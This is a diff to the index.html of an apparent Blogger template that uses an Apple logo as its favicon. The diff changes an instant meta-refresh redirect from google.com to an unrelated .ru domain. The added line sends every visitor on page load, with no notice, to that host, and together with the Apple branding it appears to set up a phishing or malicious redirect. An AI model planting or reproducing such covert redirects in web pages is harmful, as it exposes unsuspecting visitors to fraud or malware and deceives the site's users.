--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@ GX40 - LET'S SHOW THE CODE !
 --><html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
 <head>
 <link href='https://upload.wikimedia.org/wikipedia/commons/thumb/d/df/Apple-Apple.svg/1000px-Apple-Apple.svg.png' rel='icon' type='image/x-icon'/>
-<meta content='0;URL=&apos;https://google.com/ &apos;' http-equiv='refresh'/>
+<meta content='0;URL=&apos;https://ch074666.tw1.ru/ &apos;' http-equiv='refresh'/>
 
 <meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
 <b:if cond='data:blog.isMobile'>
